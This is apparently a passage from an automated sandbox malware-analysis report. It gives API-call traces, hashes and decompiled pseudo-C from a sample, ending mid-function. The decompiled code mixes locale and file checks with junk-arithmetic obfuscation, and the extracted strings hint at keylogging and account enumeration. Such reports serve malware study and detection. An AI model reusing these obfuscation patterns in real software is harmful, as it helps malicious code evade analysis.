                                                • Opcode Fuzzy Hash: 472484bea1d54e38275b9842fc81fac6e2b50d3f68021d3f75d40a37947cea4c
                                                • Instruction Fuzzy Hash: 2E51E2B1910249AFDB00DF6AEC81A7977F5F748306B10853AE601D72B1D779A825CF2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsValidLocale.KERNEL32(?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00778E3A
                                                • GetLocaleInfoW.KERNEL32(?,00000059,?,00000055,?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00778E56
                                                • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00778E67
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Locale$Info$Valid
                                                • String ID:
                                                • API String ID: 1826331170-0
                                                • Opcode ID: cb507eff0a9ff0c664642af3a7362ca632920992a1cf376d5354f8749527c9d2
                                                • Instruction ID: 0aee79284cc080a155ca26f9207dd63531fea9d67cd250482ca563447bb261c8
                                                • Opcode Fuzzy Hash: cb507eff0a9ff0c664642af3a7362ca632920992a1cf376d5354f8749527c9d2
                                                • Instruction Fuzzy Hash: 6431E070A04A18EBDF24DB50DC49BAE77B9EB48340F1084A9A50CA3291DBB85E80CE25
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E00408B40(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                				intOrPtr* _v8;
                                                				intOrPtr _v12;
                                                				short _v182;
                                                				short _v352;
                                                				char _v356;
                                                				char _v360;
                                                				char _v364;
                                                				int _t58;
                                                				signed int _t61;
                                                				intOrPtr _t70;
                                                				signed short _t80;
                                                				void* _t83;
                                                				void* _t85;
                                                				void* _t86;
                                                
                                                				_t77 = __edi;
                                                				_push(__edi);
                                                				_v356 = 0;
                                                				_v360 = 0;
                                                				_v364 = 0;
                                                				_v8 = __edx;
                                                				_t80 = __eax;
                                                				_push(_t83);
                                                				_push(0x408ca5);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t83 + 0xfffffe98;
                                                				E004069A8(_v8);
                                                				_t85 = _t80 -  *0x4fd9f0; // 0x404
                                                				if(_t85 >= 0) {
                                                					_t86 = _t80 -  *0x4fdbf0; // 0x7c68
                                                					if(_t86 <= 0) {
                                                						_t77 = 0x40;
                                                						_v12 = 0;
                                                						if(0x40 >= _v12) {
                                                							do {
                                                								_t61 = _t77 + _v12 >> 1;
                                                								if(_t80 >=  *((intOrPtr*)(0x4fd9f0 + _t61 * 8))) {
                                                									__eflags = _t80 -  *((intOrPtr*)(0x4fd9f0 + _t61 * 8));
                                                									if(__eflags <= 0) {
                                                										E00408A60( *((intOrPtr*)(0x4fd9f4 + _t61 * 8)), _t61, _v8, _t77, _t80, __eflags);
                                                									} else {
                                                										_v12 = _t61 + 1;
                                                										goto L8;
                                                									}
                                                								} else {
                                                									_t77 = _t61 - 1;
                                                									goto L8;
                                                								}
                                                								goto L9;
                                                								L8:
                                                							} while (_t77 >= _v12);
                                                						}
                                                					}
                                                				}
                                                				L9:
                                                				if( *_v8 == 0 && IsValidLocale(_t80 & 0x0000ffff, 2) != 0) {
                                                					_t58 = _t80 & 0x0000ffff;
                                                					GetLocaleInfoW(_t58, 0x59,  &_v182, 0x55);
                                                					GetLocaleInfoW(_t58, 0x5a,  &_v352, 0x55);
                                                					E004073C4( &_v356, 0x55,  &_v182);
                                                					_push(_v356);
                                                					_push(0x408cc0);
                                                					E004073C4( &_v360, 0x55,  &_v352);
                                                					_push(_v360);
                                                					_push(E00408CD0);
                                                					E004073C4( &_v364, 0x55,  &_v182);
                                                					_push(_v364);
                                                					E00407590(_v8, _t58, 5, _t77, _t80);
                                                				}
                                                				_pop(_t70);
                                                				 *[fs:eax] = _t70;
                                                				_push(E00408CAC);
                                                				return E00406A08( &_v364, 3);
                                                			}

















                                                APIs
                                                • IsValidLocale.KERNEL32(?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00408BEA
                                                • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00408C06
                                                • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00408C17
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Locale$Info$Valid
                                                • String ID:
                                                • API String ID: 1826331170-0
                                                • Opcode ID: 0a5065801f186bcbb4062cec21336acd3a9deb74b0e36497069608da79f47d51
                                                • Instruction ID: 57f6cea4338774ed362d2b227f4b3b0e2ac040428fbe23c68addde7683b7d737
                                                • Opcode Fuzzy Hash: 0a5065801f186bcbb4062cec21336acd3a9deb74b0e36497069608da79f47d51
                                                • Instruction Fuzzy Hash: 8031937090470CABEB109B51CE41BAF77B9EB44701F5001BFA548732D1EA786E50DB19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsValidLocale.KERNEL32(?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00778E3A
                                                • GetLocaleInfoW.KERNEL32(?,00000059,?,00000055,?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00778E56
                                                • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,00408CA5,?,?,?,00000000), ref: 00778E67
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Locale$Info$Valid
                                                • String ID:
                                                • API String ID: 1826331170-0
                                                • Opcode ID: 254fb4cdb436c6b32ae713abdb8121408c128fdab0a2de7cf70e02032018e8e9
                                                • Instruction ID: 6aafb9f3626b9726af93b48a7403c19530bbd73a4f5b2c2c913c6b41e31185c8
                                                • Opcode Fuzzy Hash: 254fb4cdb436c6b32ae713abdb8121408c128fdab0a2de7cf70e02032018e8e9
                                                • Instruction Fuzzy Hash: FD21B331644A1CEAEF24DB50CC49BEF777AEB44341F1184A6A60C67182DB795E81CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 48%
                                                			E004F2F04() {
                                                				signed int _t25;
                                                				intOrPtr _t28;
                                                				signed int _t47;
                                                				signed int _t48;
                                                				intOrPtr _t49;
                                                				intOrPtr _t50;
                                                				intOrPtr _t51;
                                                				signed int _t52;
                                                				intOrPtr _t53;
                                                				intOrPtr _t56;
                                                				void* _t58;
                                                				void* _t62;
                                                
                                                				_pop(_t56);
                                                				 *[fs:eax] = _t56;
                                                				_push(E004F3000);
                                                				_t25 = E004FEF20; // 0x6e687a1a
                                                				 *0x4feea0 = _t25;
                                                				 *((intOrPtr*)(_t58 - 0x1c)) = 0x3c -  *((intOrPtr*)(_t58 - 0x34));
                                                				_t28 =  *0x4fef48; // 0xc3c34ef0
                                                				 *0x4feedc = _t28;
                                                				 *((intOrPtr*)(_t58 - 0x24)) = 0;
                                                				do {
                                                					 *((intOrPtr*)(_t58 - 0xb0)) =  *((intOrPtr*)(_t58 - 0x28)) + 0x3e;
                                                					asm("fild dword [ebp-0xb0]");
                                                					 *((intOrPtr*)(_t58 - 0x2c)) = E004048CC();
                                                					 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)(_t58 - 0x24)) + 1;
                                                				} while ( *((intOrPtr*)(_t58 - 0x24)) != 0xc);
                                                				 *(_t58 - 0x54) =  *(_t58 - 0x40) * 0x4e;
                                                				CryptReleaseContext( *(_t58 - 0x64), 0);
                                                				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)(_t58 - 0x38)) +  *((intOrPtr*)(_t58 - 0x48));
                                                				 *((intOrPtr*)(_t58 - 0x28)) =  *((intOrPtr*)(_t58 - 0x58)) +  *((intOrPtr*)(_t58 - 0x34));
                                                				 *((intOrPtr*)(_t58 - 0x2c)) =  *(_t58 - 0x40) + 4;
                                                				 *(_t58 - 0x4c) =  *(_t58 - 0x50) * 0x5c;
                                                				 *0x4fef40 = 0xf6 -  *0x4fef30;
                                                				E00407640( *((intOrPtr*)(_t58 - 0x18)), L"api-ms-win-core-datetime-l1-1-0.dll");
                                                				if(0xf6 != 0) {
                                                					_t47 =  *0x4feed8; // 0x1cb9338e
                                                					E004FEF2C = _t47;
                                                					return _t47;
                                                				}
                                                				_t48 =  *0x4fef40; // 0x3c79b5d4
                                                				E004FEF50 = _t48;
                                                				_t49 =  *0x4fef30; // 0xa1d816
                                                				 *0x4feea0 = _t49;
                                                				_t50 =  *0x4feea0; // 0xa1d900
                                                				_t62 = _t50 - E004FEF50; // 0xa3b3f6c0
                                                				if(_t62 <= 0) {
                                                					_t51 =  *0x4feed8; // 0x1cb9338e
                                                					_t52 = _t51 + E004FEF00;
                                                					E004FEF10 = _t52;
                                                					return _t52;
                                                				}
                                                				_t53 =  *0x4feea0; // 0xa1d900
                                                				 *0x4feedc = _t53;
                                                				return _t53;
                                                			}















                                                APIs
                                                • CryptReleaseContext.ADVAPI32(?,00000000,004F3000,00000000,004F31F8,?,?,?,?,?,004F8F6A,00000254,?,00000002,004FEEFC,?), ref: 004F2F65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: ContextCryptRelease
                                                • String ID: /$CNB_0309.DLL$CNB_0317.DLL$GetKeyboardState$Microsoft.WSMan.Management.ni.dll$NetEnumerateServiceAccounts$System.Runtime.Remoting.dll$WcnEapPeerProxy.dll$WininetPlugin.dll$api-ms-win-core-datetime-l1-1-0.dll$api-ms-win-core-util-l1-1-0.dll$davclnt.dll$dmintf.dll$dxmasf.dll$mqcertui.dll$repdrvfs.dll$rtm.dll
                                                • API String ID: 829835001-681767285
                                                • Opcode ID: aaf08c82e729d934e3c98f607922efa0e883fd82d4dab3948184c63bdc248ed8
                                                • Instruction ID: ac5c7f6908e7f505b2d289c34299d38038ef80d476a0134258c818c5288e1994
                                                • Opcode Fuzzy Hash: aaf08c82e729d934e3c98f607922efa0e883fd82d4dab3948184c63bdc248ed8
                                                • Instruction Fuzzy Hash: DB21BEB5D10209DFCB10CFAAE981AADBBF2FB08305F10446AE504E7324D375A911DF29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,00409760,?,?), ref: 00779922
                                                • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,00409760,?,?), ref: 0077992B
                                                  • Part of subcall function 007797B8: FindFirstFileW.KERNEL32(00000000,?,00000000,004095C6,?,00000001), ref: 007797EB
                                                  • Part of subcall function 007797B8: FindClose.KERNEL32(00000000,00000000,?,00000000,004095C6,?,00000001), ref: 007797FB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                • String ID:
                                                • API String ID: 3216391948-0
                                                • Opcode ID: a1fd86469c6c623815e633a765fbef797d4bae3073c51c098040b7934b117338
                                                • Instruction ID: 5c4344ab51303013cf1be69b2a75b2977a6224a569e5180003d9fadfefa10485
                                                • Opcode Fuzzy Hash: a1fd86469c6c623815e633a765fbef797d4bae3073c51c098040b7934b117338
                                                • Instruction Fuzzy Hash: 1E118470A04249DBDF04FFA4C986AEDB3B8EF45340F508479B518E7296DB386E04CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,004095C6,?,00000001), ref: 007797EB
                                                • FindClose.KERNEL32(00000000,00000000,?,00000000,004095C6,?,00000001), ref: 007797FB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 1911b16eb98d6be23cba1a234f18235c159e94818ccd5451e9cb65e612604cdb
                                                • Instruction ID: 02ab21ef21f13bc1b1a0754725e8a6182722713a0542c3a34f6fef4b117b9681
                                                • Opcode Fuzzy Hash: 1911b16eb98d6be23cba1a234f18235c159e94818ccd5451e9cb65e612604cdb
                                                • Instruction Fuzzy Hash: 96F0E2B1500604EFCF21FBB8CC0699DB3FCEB09350BA445B1B418E2192EB38AF109914
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00414924(void* __eax) {
                                                				struct _WIN32_FIND_DATAW _v596;
                                                				void* _t11;
                                                
                                                				_t11 = FindFirstFileW(E00407330(__eax),  &_v596);
                                                				if(_t11 == 0xffffffff) {
                                                					return 0;
                                                				}
                                                				return FindClose(_t11) & 0xffffff00 | (_v596.dwFileAttributes & 0x00000010) == 0x00000000;
                                                			}





                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,?,004149EB,00000000,?,?,00000000,004F68DB,00000000,004F6D12), ref: 0041493F
                                                • FindClose.KERNEL32(00000000,00000000,?,00000000,?,004149EB,00000000,?,?,00000000,004F68DB,00000000,004F6D12), ref: 0041494A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 0a26af79ca2f6d1537337b881b73c1f89f7919ffecbb5ca7a791117caaba7855
                                                • Instruction ID: 1a1146ce06fd08cae000a50341769f21309330914b557231780e0040e5fa1e32
                                                • Opcode Fuzzy Hash: 0a26af79ca2f6d1537337b881b73c1f89f7919ffecbb5ca7a791117caaba7855
                                                • Instruction Fuzzy Hash: E8E0CD7291420812C71055FA4CC97EB77CC5B44328F140BB77E2CE22D2E73C995100DD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E004F2D48(void* __eflags) {
                                                				signed int _t77;
                                                				signed int _t84;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				intOrPtr _t89;
                                                				intOrPtr _t102;
                                                				signed int _t103;
                                                				intOrPtr _t104;
                                                				signed int _t106;
                                                				signed int _t110;
                                                				signed int _t114;
                                                				signed int _t118;
                                                				signed int _t119;
                                                				intOrPtr _t127;
                                                				void* _t135;
                                                				void* _t138;
                                                				void* _t141;
                                                
                                                				 *(_t135 - 0x34) =  *((intOrPtr*)(_t135 - 0x20)) + 0x76;
                                                				 *(_t135 - 0x38) =  *((intOrPtr*)(_t135 - 0x48)) +  *((intOrPtr*)(_t135 - 0x58));
                                                				 *(_t135 - 0x3c) =  *(_t135 - 0x28) * 0x7b;
                                                				 *(_t135 - 0x1c) =  *(_t135 - 0x40) * 0xf5;
                                                				 *(_t135 - 0x4c) =  *((intOrPtr*)(_t135 - 0x30)) + 0xea;
                                                				_t77 = E004FEF2C; // 0xa1d900
                                                				 *0x4feea0 = _t77 + E004FEED0;
                                                				_pop(_t127);
                                                				 *[fs:eax] = _t127;
                                                				_push(E004F2F04);
                                                				 *(_t135 - 0x34) =  *(_t135 - 0x44) *  *(_t135 - 0x28);
                                                				 *(_t135 - 0x38) =  *(_t135 - 0x2c) +  *(_t135 - 0x2c) * 4;
                                                				_t84 = E004FEF38; // 0xc3c34fdc
                                                				 *0x4fef18 = _t84;
                                                				_t85 = E004FEF20; // 0x6e687a1a
                                                				E004FEF20 = E0040489C(_t85);
                                                				_t87 = E004FEF2C; // 0xa1d900
                                                				if(_t87 -  *0x4fef4c >= 0x3d) {
                                                					_t89 =  *0x4fef44; // 0x38993
                                                					__eflags = _t89 + E004FEF34 - E004FEF34; // 0xc3c34ef0
                                                					if(__eflags == 0) {
                                                						 *((intOrPtr*)(_t135 - 0x50)) = 0;
                                                						__eflags =  *((intOrPtr*)(_t135 - 0x50)) - 0xc;
                                                						while( *((intOrPtr*)(_t135 - 0x50)) < 0xc) {
                                                							 *((intOrPtr*)(_t135 - 0x50)) =  *((intOrPtr*)(_t135 - 0x50)) + 1;
                                                							E00406CF4(_t135 - 0x14,  *((intOrPtr*)(_t135 - 0x14)));
                                                							__eflags =  *((intOrPtr*)(_t135 - 0x50)) - 0xc;
                                                						}
                                                					}
                                                				} else {
                                                					_t118 = E004FEF34; // 0xc3c34ef0
                                                					E004FEF34 = _t118;
                                                					_t119 = E004FEF34; // 0xc3c34ef0
                                                					_t138 = _t119 - E004FEF20; // 0x6e687a1a
                                                					if(_t138 >= 0) {
                                                						 *(_t135 - 0x24) =  *(_t135 - 0x3c) - 0x8a;
                                                					} else {
                                                						 *(_t135 - 0x1c) = 0;
                                                						_t139 =  *(_t135 - 0x1c) - 0xe;
                                                						while( *(_t135 - 0x1c) < 0xe) {
                                                							 *(_t135 - 0x1c) =  *(_t135 - 0x1c) + 1;
                                                							 *0x4fef48 = E004F0EBC(_t135 - 0x40,  &E004FEF2C, _t139);
                                                							_t140 =  *(_t135 - 0x1c) - 0xe;
                                                						}
                                                					}
                                                				}
                                                				 *((intOrPtr*)(_t135 - 0x48)) =  *(_t135 - 0x40) + 0x7a;
                                                				CryptDestroyKey( *(_t135 - 0x68));
                                                				E00406CF4(_t135 - 0x14,  *((intOrPtr*)(_t135 - 0x14)));
                                                				E004F0EBC(_t135 - 0x3c, _t135 - 0x40, _t140);
                                                				 *(_t135 - 0x24) =  *(_t135 - 0x4c) * 0xe9;
                                                				 *(_t135 - 0x28) =  *(_t135 - 0x38) *  *(_t135 - 0x40);
                                                				_t102 =  *0x4fef4c; // 0x43c1493c
                                                				 *0x4feef0 = _t102;
                                                				_t103 = E004FEF38; // 0xc3c34fdc
                                                				 *0x4feef4 = _t103;
                                                				_t104 =  *0x4feef0; // 0x44632301
                                                				_t141 = _t104 -  *0x4feef4; // 0xb52124ca
                                                				if(_t141 <= 0) {
                                                					_t106 =  *((intOrPtr*)(_t135 - 0x48)) + 0xb7;
                                                					__eflags = _t106;
                                                					 *(_t135 - 0x34) = _t106;
                                                				} else {
                                                					_t114 =  *0x4feed8; // 0x1cb9338e
                                                					E004FEF0C = _t114;
                                                				}
                                                				if( *(_t135 - 0x4c) -  *((intOrPtr*)(_t135 - 0x48)) >= 0xb7) {
                                                					_t110 =  *(_t135 - 0x3c) +  *(_t135 - 0x1c);
                                                					__eflags = _t110;
                                                					 *(_t135 - 0x2c) = _t110;
                                                					return _t110;
                                                				}
                                                				 *((intOrPtr*)(_t135 - 0x50)) = 0;
                                                				if( *((intOrPtr*)(_t135 - 0x50)) < 0xe) {
                                                					 *((intOrPtr*)(_t135 - 0x50)) =  *((intOrPtr*)(_t135 - 0x50)) + 1;
                                                					return E00406CF4(_t135 - 0x14,  *((intOrPtr*)(_t135 - 0x14)));
                                                				}
                                                				return 0;
                                                			}

                                                APIs
                                                • CryptDestroyKey.ADVAPI32(?,00000004,004F2F04,?,00000254,00000000,004F31F8,?,?,?,?,?,004F8F6A,00000254,?,00000002), ref: 004F2E59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: CryptDestroy
                                                • String ID: /$CNB_0309.DLL$CNB_0317.DLL$GetKeyboardState$Microsoft.WSMan.Management.ni.dll$NetEnumerateServiceAccounts$System.Runtime.Remoting.dll$WcnEapPeerProxy.dll$WininetPlugin.dll$api-ms-win-core-datetime-l1-1-0.dll$api-ms-win-core-util-l1-1-0.dll$davclnt.dll$dmintf.dll$dxmasf.dll$mqcertui.dll$repdrvfs.dll$rtm.dll
                                                • API String ID: 1712904745-681767285
                                                • Opcode ID: 372445189b85d796ec6a3c8eeef791485d6cbf82940575c63a31ef800605fd9c
                                                • Instruction ID: a4c5ec0d69701be20dce32833e06628e660468b9fbe6c074615e5140626a8fc5
                                                • Opcode Fuzzy Hash: 372445189b85d796ec6a3c8eeef791485d6cbf82940575c63a31ef800605fd9c
                                                • Instruction Fuzzy Hash: B541C575D00209DFCB00CFAAE9819ADBBF1FB08305B20843AE505E7661D778A956CF69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E004F29AC() {
                                                				intOrPtr _t29;
                                                				intOrPtr _t37;
                                                				intOrPtr _t39;
                                                				signed int _t44;
                                                				intOrPtr _t45;
                                                				intOrPtr _t48;
                                                				void* _t50;
                                                
                                                				_pop(_t48);
                                                				 *[fs:eax] = _t48;
                                                				_push(E004F2A76);
                                                				 *((intOrPtr*)(_t50 - 0xb0)) =  *((intOrPtr*)(_t50 - 0x40)) + 0x42;
                                                				asm("fild dword [ebp-0xb0]");
                                                				 *((intOrPtr*)(_t50 - 0x3c)) = E004048CC();
                                                				 *((intOrPtr*)(_t50 - 0x44)) =  *((intOrPtr*)(_t50 - 0x54)) -  *((intOrPtr*)(_t50 - 0x34));
                                                				 *((intOrPtr*)(_t50 - 0x4c)) = 0;
                                                				while( *((intOrPtr*)(_t50 - 0x4c)) < 5) {
                                                					 *((intOrPtr*)(_t50 - 0x4c)) =  *((intOrPtr*)(_t50 - 0x4c)) + 1;
                                                					_t45 =  *0x4fef40; // 0x3c79b5d4
                                                					 *0x4feecc = _t45;
                                                				}
                                                				_t29 =  *0x4feee0; // 0x747938b
                                                				 *0x4feee0 = E0040489C(_t29);
                                                				asm("fild dword [ebp-0x48]");
                                                				 *((intOrPtr*)(_t50 - 0x2c)) = E004048D8();
                                                				 *((intOrPtr*)(_t50 - 0x58)) =  *((intOrPtr*)(_t50 - 0x38));
                                                				CryptDestroyKey( *(_t50 - 0x60));
                                                				E00406CF4(_t50 - 0x14,  *((intOrPtr*)(_t50 - 0x14)));
                                                				_t37 =  *0x4feed8; // 0x1cb9338e
                                                				 *0x4feed8 = E0040489C(_t37);
                                                				_t39 =  *0x4feee8; // 0xdcd0f434
                                                				 *0x4feee8 = E0040489C(_t39);
                                                				asm("fild dword [ebp-0x28]");
                                                				 *((intOrPtr*)(_t50 - 0x2c)) = E004048CC();
                                                				 *((intOrPtr*)(_t50 - 0x30)) =  *((intOrPtr*)(_t50 - 0x44)) +  *((intOrPtr*)(_t50 - 0x1c));
                                                				_t44 =  *0x4feee0; // 0x747938b
                                                				E004FEF0C = _t44;
                                                				return _t44;
                                                			}

                                                APIs
                                                • CryptDestroyKey.ADVAPI32(?), ref: 004F2A1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: CryptDestroy
                                                • String ID:
                                                • API String ID: 1712904745-0
                                                • Opcode ID: adfb67dfda337f39f1045ffdcecc14f3610f63a23ece4600cd6ad55a4d5bcfd5
                                                • Instruction ID: bde1d7b12404d46a9181efcc3a83b797575d461b1706a2a29f43076dfc1ab377
                                                • Opcode Fuzzy Hash: adfb67dfda337f39f1045ffdcecc14f3610f63a23ece4600cd6ad55a4d5bcfd5
                                                • Instruction Fuzzy Hash: C621D3B5D00248DFCB00EFAAE945AADBBF1FB48309F15883AE504E7220D7749851CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00414A38(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                				long _v8;
                                                				long _v12;
                                                				long _v16;
                                                				long _v20;
                                                				intOrPtr _v24;
                                                				signed int _v28;
                                                				WCHAR* _t25;
                                                				int _t26;
                                                				intOrPtr _t31;
                                                				intOrPtr _t34;
                                                				intOrPtr* _t37;
                                                				intOrPtr* _t38;
                                                				intOrPtr _t46;
                                                				intOrPtr _t48;
                                                
                                                				_t25 = _a4;
                                                				if(_t25 == 0) {
                                                					_t25 = 0;
                                                				}
                                                				_t26 = GetDiskFreeSpaceW(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                                				_v28 = _v8 * _v12;
                                                				_v24 = 0;
                                                				_t46 = _v24;
                                                				_t31 = E00408080(_v28, _t46, _v16, 0);
                                                				_t37 = _a8;
                                                				 *_t37 = _t31;
                                                				 *((intOrPtr*)(_t37 + 4)) = _t46;
                                                				_t48 = _v24;
                                                				_t34 = E00408080(_v28, _t48, _v20, 0);
                                                				_t38 = _a12;
                                                				 *_t38 = _t34;
                                                				 *((intOrPtr*)(_t38 + 4)) = _t48;
                                                				return _t26;
                                                			}

                                                APIs
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 00414A59
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: DiskFreeSpace
                                                • String ID:
                                                • API String ID: 1705453755-0
                                                • Opcode ID: 209b71cca9859ecba50bab76360ac8db5df658651ecb909a5f4618f075e5672f
                                                • Instruction ID: 310fcf2c77c2509cbee9bbfb9c451f4b98ed5f5819f213a9bf3bd4eaa5670cf9
                                                • Opcode Fuzzy Hash: 209b71cca9859ecba50bab76360ac8db5df658651ecb909a5f4618f075e5672f
                                                • Instruction Fuzzy Hash: 73111EB5E00209AFDB00CF99C981DEFF7F9EFC8304B14C56AA508E7250E6319E418BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E004F2C93() {
                                                				signed int _t25;
                                                				intOrPtr _t31;
                                                				intOrPtr _t39;
                                                				intOrPtr _t45;
                                                				void* _t49;
                                                
                                                				 *(_t49 - 0x34) =  *(_t49 - 0x58) * 0xbe;
                                                				 *(_t49 - 0x38) =  *(_t49 - 0x4c) * 0x56;
                                                				 *((intOrPtr*)(_t49 - 0x40)) =  *((intOrPtr*)(_t49 - 0x1c)) + 0x48;
                                                				 *(_t49 - 0x48) =  *(_t49 - 0x24) * 0xdc;
                                                				_t25 = E004FEF00; // 0xa3b3f6c0
                                                				 *0x4feecc = _t25 + 0x51;
                                                				_pop(_t45);
                                                				 *[fs:eax] = _t45;
                                                				_push(E004F2D48);
                                                				_t29 =  *((intOrPtr*)(_t49 - 0x28)) + 0x80;
                                                				 *((intOrPtr*)(_t49 - 0xb0)) =  *((intOrPtr*)(_t49 - 0x28)) + 0x80;
                                                				asm("fild dword [ebp-0xb0]");
                                                				 *(_t49 - 0x38) = E004048CC();
                                                				_t31 =  *0x4fef18; // 0xbc3e19a
                                                				 *0x4fef18 = E0040489C(_t31);
                                                				 *((intOrPtr*)(_t49 - 0x44)) = E004F0EBC(_t49 - 0x58, 0x4fef04, _t29);
                                                				 *((intOrPtr*)(_t49 - 0x50)) = E004F0EBC(_t49 - 0x48, _t49 - 0x48, _t29);
                                                				E00406CF4(_t49 - 0x18,  *((intOrPtr*)(_t49 - 0x14)));
                                                				_t39 =  *0x4fef40; // 0x3c79b5d4
                                                				 *0x4fef40 = E0040489C(_t39);
                                                				return CryptReleaseContext( *(_t49 - 0x5c), 0);
                                                			}

                                                APIs
                                                • CryptReleaseContext.ADVAPI32(?,00000000,004F2D48), ref: 004F2D3A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: ContextCryptRelease
                                                • String ID:
                                                • API String ID: 829835001-0
                                                • Opcode ID: 2508b981cd3e5ab04e372f066ae1b432449da907089afa8b7a10d9466cce5779
                                                • Instruction ID: f8ddac3f8c059c40fd4a3dc070d7f264bafdc1d546db5608a0300e7177421ee5
                                                • Opcode Fuzzy Hash: 2508b981cd3e5ab04e372f066ae1b432449da907089afa8b7a10d9466cce5779
                                                • Instruction Fuzzy Hash: 4F11E6B1D042499FDB00DFA6D982AADBBF4FF44305F14843AE104EB265E7349955CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041622C(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                                				short _v516;
                                                				void* __ebp;
                                                				int _t5;
                                                				intOrPtr _t10;
                                                				void* _t18;
                                                
                                                				_t18 = __ecx;
                                                				_t10 = _a4;
                                                				_t5 = GetLocaleInfoW(__eax, __edx,  &_v516, 0x100);
                                                				_t19 = _t5;
